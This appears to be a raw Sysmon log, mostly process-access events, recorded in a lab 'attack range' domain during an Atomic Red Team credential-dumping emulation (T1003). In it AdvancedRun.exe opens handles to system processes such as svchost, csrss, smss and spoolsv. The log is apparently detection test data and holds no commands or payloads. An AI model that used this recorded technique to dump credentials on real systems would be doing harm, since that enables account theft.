17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953012Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953010Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953009Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953006Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003953002Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952971Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.512{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952970Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003952969Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.512{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003952968Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
